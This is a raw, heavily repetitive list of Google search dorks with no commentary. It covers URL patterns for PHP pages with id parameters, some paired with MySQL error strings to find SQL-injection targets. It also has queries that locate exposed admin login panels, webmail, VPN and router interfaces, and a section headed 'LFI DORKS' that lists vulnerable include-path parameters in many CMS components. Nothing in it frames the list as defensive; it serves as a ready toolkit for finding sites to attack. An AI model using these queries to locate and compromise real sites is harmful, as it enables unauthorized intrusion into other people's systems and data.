inurl:aboutbook.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:pages.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurl:opinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

intitle:axis intitle:"video server"

inurl:indexFrame.shtml Axis

?intitle:index.of? mp3 artist-name-here

"intitle:index of"

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurl:participant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:prod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurl:person.php?id=

inurl:productinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurl:profile_view.php?id=

inurl:category.php?id=

inurl:publications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurl:prod_info.php?id=

inurl:shop.php?do=part&id=

inurl:Productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurl:product.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurl:produit.php?id=

inurl:pop.php?id=

inurl:shopping.php?id=

inurl:productdetail.php?id=

inurl:post.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurl:page.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:aboutbook.php?id=

inurl:review.php?id=

inurl:loadpsb.php?id=

inurl:ages.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurl:opinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()

intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"

intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu

intext:"Mail admins login here to administrate your domain."

intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin

intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin

intext:"Storage Management Server for" intitle:"Server Administration"

intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee

intext:"vbulletin" inurl:admincp

intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press

intitle:"Admin Login" "admin login" "blogware"

intitle:"Admin login" "Web Site Administration" "Copyright"

intitle:"AlternC Desktop"

intitle:"Athens Authentication Point"

intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net

intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co

intitle:"ColdFusion Administrator Login"

intitle:"communigate pro * *" intitle:"entrance"

intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo

intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo

intitle:"Dell Remote Access Controller"

intitle:"Docutek ERes - Admin Login" -edu

intitle:"Employee Intranet Login"

intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."

intitle:"ePowerSwitch Login"

intitle:"eXist Database Administration" -demo

intitle:"EXTRANET * - Identification"

intitle:"EXTRANET login" -.edu -.mil -.gov

intitle:"EZPartner" -netpond

intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists

intitle:"i-secure v1.1" -edu

intitle:"Icecast Administration Admin Page"

intitle:"iDevAffiliate - admin" -demo

intitle:"ISPMan : Unauthorized Access prohibited"

intitle:"ITS System Information" "Please log on to the SAP System"

intitle:"Kurant Corporation StoreSense" filetype:bok

intitle:"ListMail Login" admin -demo

intitle:"Login -

intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman

intitle:"Login to Cacti"

intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=

intitle:"MailMan Login"

intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi

intitle:"Merak Mail Server Web Administration" -ihackstuff.com

intitle:"microsoft certificate services" inurl:certsrv

intitle:"MikroTik RouterOS Managing Webpage"

intitle:"MX Control Console" "If you can't remember"

intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf

intitle:"Novell Web Services" intext:"Select a service and a language."

intitle:"oMail-admin Administration - Login" -inurl:omnis.ch

intitle:"OnLine Recruitment Program - Login"

intitle:"Philex 0.2*" -s?ri?t -site:freelists.org

intitle:"PHP Advanced Transfer" inurl:"login.php"

intitle:"php icalendar administration" -site:sourceforge.net

intitle:"php icalendar administration" -site:sourceforge.net

intitle:"phpPgAdmin - Login" Language

intitle:"PHProjekt - login" login password

intitle:"please login" "your password is *"

intitle:"Remote Desktop Web Connection" inurl:tsweb

intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"

intitle:"SHOUTcast Administrator" inurl:admin.cgi

intitle:"site administration: please log in" "site designed by emarketsouth"

intitle:"Supero Doctor III" -inurl:supermicro

intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"

intitle:"teamspeak server-administration

intitle:"Tomcat Server Administration"

intitle:"TOPdesk ApplicationServer"

intitle:"TUTOS Login"

intitle:"TWIG Login"

intitle:"vhost" intext:"vHost . 2000-2004"

intitle:"Virtual Server Administration System"

intitle:"VisNetic WebMail" inurl:"/mail/"

intitle:"VitalQIP IP Management System"

intitle:"VMware Management Interface:" inurl:"vmware/en/"

intitle:"VNC viewer for Java"

intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org

intitle:"WebLogic Server" intitle:"Console Login" inurl:console

intitle:"Welcome Site/User Administrator" "Please select the language" -demos

intitle:"Welcome to Mailtraq WebMail"

intitle:"welcome to netware *" -site:novell.com

intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."

intitle:"xams 0.0.0..15 - Login"

intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin

intitle:"XMail Web Administration Interface" intext:Login intext:password

intitle:"Zope Help System" inurl:HelpSys

intitle:"ZyXEL Prestige Router" "Enter password"

intitle:"inc. vpn 3000 concentrator"

intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com

intitle:asterisk.management.portal web-access

intitle:endymion.sak?.mail.login.page | inurl:sake.servlet

intitle:Group-Office "Enter your username and password to login"

intitle:ilohamail "

IlohaMail"

intitle:ilohamail intext:"Version 0.8.10" "

IlohaMail"

intitle:IMP inurl:imp/index.php3

intitle:Login * Webmailer

intitle:Login intext:"RT is ? Copyright"

intitle:Node.List Win32.Version.3.11

intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"

intitle:open-xchange inurl:login.pl

intitle:Ovislink inurl:private/login

intitle:phpnews.login

intitle:plesk inurl:login.php3

inurl:"/admin/configuration. php?" Mystore

inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"

inurl:"1220/parse_xml.cgi?"

inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)

inurl:":10000" intext:webmin

inurl:"Activex/default.htm" "Demo"

inurl:"calendar.asp?action=login"

inurl:"default/login.php" intitle:"kerio"

inurl:"gs/adminlogin.aspx"

inurl:"php121login.php"

inurl:"suse/login.pl"

inurl:"typo3/index.php?u=" -demo

inurl:"usysinfo?login=true"

inurl:"utilities/TreeView.asp"

inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp

inurl:/admin/login.asp

inurl:/cgi-bin/sqwebmail?noframes=1

inurl:/Citrix/Nfuse17/

inurl:/dana-na/auth/welcome.html

inurl:/eprise/

inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net

inurl:/modcp/ intext:Moderator+vBulletin

inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"

inurl:/webedit.* intext:WebEdit Professional -html

inurl:1810 "Oracle Enterprise Manager"

inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com

inurl::2082/frontend -demo

inurl:administrator "welcome to mambo"

inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0

inurl:cgi-bin/ultimatebb.cgi?ubb=login

inurl:Citrix/MetaFrame/default/default.aspx

inurl:confixx inurl:login|anmeldung

inurl:coranto.cgi intitle:Login (Authorized Users Only)

inurl:csCreatePro.cgi

inurl:default.asp intitle:"WebCommander"

inurl:exchweb/bin/auth/owalogon.asp

inurl:gnatsweb.pl

inurl:ids5web

inurl:irc filetype:cgi cgi:irc

inurl:login filetype:swf swf

inurl:login.asp

inurl:login.cfm

inurl:login.php "SquirrelMail version"

inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

inurl:mewebmail

inurl:names.nsf?opendatabase

inurl:ocw_login_username

inurl:orasso.wwsso_app_admin.ls_login

inurl:postfixadmin intitle:"postfix admin" ext:php

inurl:search/admin.php

inurl:textpattern/index.php

inurl:WCP_USER

inurl:webmail./index.pl "Interface"

inurl:webvpn.html "login" "Please enter your"

---LFI DORKS---------------------

inurl:/filedown.php?file=

inurl:/news.php?include=

inurl:/view/lang/index.php?page=?page=

inurl:/shared/help.php?page=

inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

inurl:/squirrelcart/cart_content.php?cart_isp_root=

inurl:index2.php?to=

inurl:index.php?load=

inurl:home.php?pagina=

/surveys/survey.inc.php?path=

index.php?body=

/classes/adodbt/sql.php?classes_dir=

enc/content.php?Home_Path=

/classified_right.php?language_dir=

/sources/functions.php?CONFIG[main_path]=

/sources/template.php?CONFIG[main_path]=

/embed/day.php?path=

/includes/dbal.php?eqdkp_root_path=

/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=

/includes/kb_constants.php?module_root_path=

/mcf.php?content=

/components/com_facileforms/facileforms.frame.php?ff_compath=

skins/advanced/advanced1.php?pluginpath[0]=

/zipndownload.php?PP_PATH=

/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=

/components/com_zoom/includes/database.php?mosConfig_absolute_path=

/main.php?sayfa=

/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=

/addpost_newpoll.php?addpoll=preview&thispath=

/header.php?abspath=

components/com_performs/performs.php?mosConfig_absolute_path=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

impex/ImpExData.php?systempath=

/modules/vwar/admin/admin.php?vwar_root=

/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

/tools/send_reminders.php?includedir= allinurl:day.php?date=

/skin/zero_vote/error.php?dir=

/modules/TotalCalendar/about.php?inc_dir=

/login.php?dir=

/tags.php?BBCodeFile=

index.php?pageurl=

/templates/headline_temp.php?nst_inc=

index.php?var=

index.php?pagina=

index.php?go=

index.php?site=

phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

index.php?pagina=

index.php?id=

index1.php?=

index.php?site=

main.php?id=

content.php?page=

admin.php?page=

lib/gore.php?libpath=

SQuery/lib/gore.php?libpath=

index2.php?p=

index1.php?go= 

news_detail.php?file=

old_reports.php?file=

index.php?x=

index.php?nic=

homepage.php?sel=

index.php?sel=

main.php?x=

components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=

index2.php?x=

main.php?pagina=

test.php?page=

components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=

akocomments.php?mosConfig_absolute_path=

index.php?page=

index.php?oldal=

index.php?lang=

index.php?pag=

index.php?incl=

avatar.php?page=

index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=

index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=

index.php?p=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

index.php?x=

index.php?mode=

index.php?stranica=

index.php?sub=

index.php?id=

index.php?t=

index.php?r=

index.php?menu=

index.php?pag=

solpot.html?body= 

port.php?content=

index0.php?show=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

/tools/send_reminders.php?includedir=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

/tags.php?BBCodeFile=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

content.php?page=

index.php?topic=

index.php?u=

administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=

administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=

modules/My_eGallery/index.php?basepath=

/modules/vwar/admin/admin.php?vwar_root=

index.php?loc=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=

/tags.php?BBCodeFile=

myevent.php?myevent_path=

/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=

myevent.php?myevent_path=

includes/functions.php?phpbb_root_path=

m2f/m2f_phpbb204.php?m2f_root_path=

/tags.php?BBCodeFile=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

show.php?path=

show.php?path=

administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=

administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=

index.php?template=

search.php?cutepath=

show_news.php?cutepath=

page.php?doc=

administrator/components/com_webring/admin.webring.docs.php?component_dir=

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= 

help.php?css_path=

components/com_galleria/galleria.html.php?mosConfig_absolute_path=

big.php?pathtotemplate=

includes/search.php?GlobalSettings[templatesDirectory]=

interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=

/functions.php?include_path=

modules/My_eGallery/index.php?basepath=

components/com_galleria/galleria.html.php?mosConfig_absolute_path=

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 

/class.mysql.php?path_to_bt_dir=   

/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/squirrelcart/cart_content.php?cart_isp_root=

index2.php?to=

index.php?load=

home.php?pagina=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/Forums/admin/admin_styles.php?phpbb_root_path=

/modules/vwar/admin/admin.php?vwar_root=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/modules/My_eGallery/public/displayCategory.php?basepath=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/modules/4nAlbum/public/displayCategory.php?basepath=

/include/write.php?dir=

db.php?path_local=

index.php?site=

index.php?url=

index.php?p=

index.php?openfile=

index.php?file=

index.php?go=

index.php?content=

index.php?side=

index.php?kobr=

index.php?doc=

index.php?l=

index.php?a=

inurl:index.php?principal=

inurl:index.php?show=

inurl:index.php?opcao=

inurl:index.php?conteudo=

index.php?meio=

index.php?inc=

index.php?c=

index.php?rage=

index.php?arquivo=

index.php?nic=

index.php?x=

components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=

index.php?place=

index.php?show=

index.php?dsp=

index.php?dept=

index.php?lg=

index.php?inhalt=

index.php?ort=

index.php?pilih=

principal.php?conteudo=

main.php?site=

template.php?pagina=

contenido.php?sec=

index_principal.php?pagina=

template.php?name=

forum.php?act=

home.php?action=

home.php?pagina=

noticias.php?arq=

main.php?x=

main.php?page=

default.php?page=

index.php?cont=

index.php?configFile=

index.php?meio.php=

index.php?include=

index.php?open=

index.php?visualizar=

index.php?x=

index.php?pag=

index.php?cat=

index.php?action=

index.php?do=

index2.php?x=

index2.php?content=

main.php?pagina=

index.phpmain.php?x=

index.php?link=

index.php?canal=

index.php?screen=

index.php?langc=

services.php?page=

htmltonuke.php?filnavn=

ihm.php?p=

folder.php?id=

index.php?Load=

index.php?Language=

hall.php?file=

hall.php?page=

template.php?goto=

video.php?content=

pages.php?page=

print.php?page=

show.php?page=

view.php?page=

media.php?page=

index1.php?choix=

index1.php?menu=

index.php?ort=

index2.php?showpage=

index2.php?ascii_seite=

index2.php?DoAction=

index2.php?ID=

index2.php?url_page=

index1.php?dat=

index1.php?site=

index0.php?show=

home.php?content=

port.php?content=

main.php?link=

home.php?x=

index1.php?x=

index2.php?x=

main.php?x=

homepage.php?sel=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/modules/agendax/addevent.inc.php?agendax_path=

/include/main.php?config[search_disp]=true&include_dir=

/contrib/yabbse/poc.php?poc_root_path=

/phpopenchat/contrib/yabbse/poc.php?sourcedir=

/photoalb/lib/static/header.php?set_menu=

/squito/photolist.inc.php?photoroot=

/bz/squito/photolist.inc.php?photoroot=

/ppa/inc/functions.inc.php?config[ppa_root_path]=

/spid/lang/lang.php?lang_path=

/classes.php?LOCAL_PATH=

al_initialize.php?alpath=

/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=

/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

/extensions/moblog/moblog_lib.php?basedir=

/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=

components/com_performs/performs.php?mosConfig_absolute_path=

modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=

/components/com_smf/smf.php?mosConfig_absolute_path=

/components/com_cpg/cpg.php?mosConfig_absolute_path=

administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=

/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=

inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep=

/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=

/jscript.php?my_ms[root]=

/popup_window.php?site_isp_root=

/yabbse/Sources/Packages.php?sourcedir=

/include/main.php?config[search_disp]=true&include_dir=

/include/main.php?config[search_disp]=true&include_dir=

/includes/functions_portal.php?phpbb_root_path=

/surveys/survey.inc.php?path=

index.php?body=

/classes/adodbt/sql.php?classes_dir=

enc/content.php?Home_Path=

/classified_right.php?language_dir=

/sources/functions.php?CONFIG[main_path]=

/sources/template.php?CONFIG[main_path]=

/embed/day.php?path=

/includes/dbal.php?eqdkp_root_path=

sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=

/includes/kb_constants.php?module_root_path=

/mcf.php?content=

/components/com_facileforms/facileforms.frame.php?ff_compath=

skins/advanced/advanced1.php?pluginpath[0]=

/zipndownload.php?PP_PATH=

/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=

/components/com_zoom/includes/database.php?mosConfig_absolute_path=

/main.php?sayfa=

/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=

/addpost_newpoll.php?addpoll=preview&thispath=

/header.php?abspath=

components/com_performs/performs.php?mosConfig_absolute_path=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

/modules/vwar/admin/admin.php?vwar_root=

/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

/tools/send_reminders.php?includedir=

/skin/zero_vote/error.php?dir=

/modules/TotalCalendar/about.php?inc_dir=

login.php?dir=

/tags.php?BBCodeFile=

index.php?pageurl=

/templates/headline_temp.php?nst_inc=

index.php?var=

index.php?pagina=

index.php?go=

index.php?site=

phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

index.php?pagina=

index.php?id=

index1.php?=

index.php?site=

main.php?id=

content.php?page=

admin.php?page=

lib/gore.php?libpath=

SQuery/lib/gore.php?libpath=

index2.php?p=

index1.php?go=

news_detail.php?file=

old_reports.php?file=

index.php?x=

index.php?nic=

homepage.php?sel=

index.php?sel= 

config.php?_CCFG[_PKG_PATH_DBSE]=

main.php?x=

components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=

index2.php?x=

main.php?pagina=

test.php?page=

components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=

akocomments.php?mosConfig_absolute_path=

index.php?page=

index.php?oldal=

index.php?lang=gr&file

index.php?pag=

index.php?incl=

avatar.php?page=

index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=

index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=

index.php?p=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

index.php?x= index.php?mode=index.php?stranica=

index.php?sub=index.php?id=index.php?t=

index.php?r=

index.php?menu=

index.php?pag=

solpot.html?body=

port.php?content=

index0.php?show=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= allinurl:day.php?date=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /tags.php?BBCodeFile=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

content.php?page=

index.php?topic=

index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=

administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGallery/index.php?basepath=

/modules/vwar/admin/admin.php?vwar_root=index.php?loc=

allinurl:.br/index.php?loc=

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=

/tags.php?BBCodeFile=

myevent.php?myevent_path=

/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=

myevent.php?myevent_path=

includes/functions.php?phpbb_root_path=

m2f/m2f_phpbb204.php?m2f_root_path=

/tags.php?BBCodeFile=

administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

show.php?path=

show.php?path=

administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=

administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=

index.php?template=

search.php?cutepath=

show_news.php?cutepath=

page.php?doc=

administrator/components/com_webring/admin.webring.docs.php?component_dir=

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=

help.php?css_path=

components/com_galleria/galleria.html.php?mosConfig_absolute_path=

big.php?pathtotemplate=

includes/search.php?GlobalSettings[templatesDirectory]=

interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=

/functions.php?include_path=

modules/My_eGallery/index.php?basepath=

components/com_galleria/galleria.html.php?mosConfig_absolute_path=

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

/class.mysql.php?path_to_bt_dir=

/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/squirrelcart/cart_content.php?cart_isp_root=

index2.php?to=

index.php?load=

home.php?pagina=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/Forums/admin/admin_styles.php?phpbb_root_path=

/modules/vwar/admin/admin.php?vwar_root=

  /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/modules/My_eGallery/public/displayCategory.php?basepath=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/modules/4nAlbum/public/displayCategory.php?basepath=

/include/write.php?dir=

db.php?path_local=

index.php?site=

index.php?url=

index.php?p=

index.php?openfile=

index.php?file=

index.php?go=

index.php?content=

index.php?side=

index.php?kobr=

index.php?pg=

index.php?doc=

index.php?l=

index.php?a=

index.php?principal=

index.php?show=

index.php?opcao=

index.php?conteudo=

index.php?meio=

index.php?inc=

index.php?c=

index.php?rage=

index.php?arquivo=

index.php?nic=

index.php?x=

components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=

index.php?place=

index.php?show=

index.php?dsp=

index.php?dept=

index.php?lg=

index.php?inhalt=

index.php?ort=

index.php?pilih=

principal.php?conteudo=

main.php?site=

template.php?pagina=

contenido.php?sec=

index_principal.php?pagina=

template.php?name=

forum.php?act=

home.php?action=

home.php?pagina=

noticias.php?arq=

main.php?x=

main.php?page=

default.php?page=

index.php?cont=

index.php?configFile=

index.php?meio.php=

index.php?include=

index.php?open=

index.php?visualizar=

index.php?x=

index.php?pag=

index.php?cat=

index.php?action=

index.php?do=

index2.php?x=

index2.php?content=

main.php?pagina=

index.phpmain.php?x=

index.php?link=

index.php?canal=

index.php?screen=

index.php?langc=

services.php?page=

htmltonuke.php?filnavn=

ihm.php?p=

folder.php?id=

index.php?Load=

index.php?Language=

hall.php?file=

hall.php?page=

template.php?goto=

video.php?content=

pages.php?page=

print.php?page=

show.php?page=

view.php?page=

media.php?page=

index1.php?choix=

index1.php?menu=

index.php?ort=

index2.php?showpage=

index2.php?ascii_seite=

index2.php?DoAction=

index2.php?ID=

index2.php?url_page=

index1.php?dat=

index1.php?site=

index0.php?show=

home.php?content=

port.php?content=

main.php?link=

home.php?x=

index1.php?x=

index2.php?x=

main.php?x=

homepage.php?sel=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/modules/agendax/addevent.inc.php?agendax_path=

/include/main.php?config[search_disp]=true&include_dir=

/contrib/yabbse/poc.php?poc_root_path=

/phpopenchat/contrib/yabbse/poc.php?sourcedir=

/photoalb/lib/static/header.php?set_menu=

/squito/photolist.inc.php?photoroot=

/bz/squito/photolist.inc.php?photoroot=

/ppa/inc/functions.inc.php?config[ppa_root_path]=

/spid/lang/lang.php?lang_path=

/classes.php?LOCAL_PATH=

al_initialize.php?alpath=

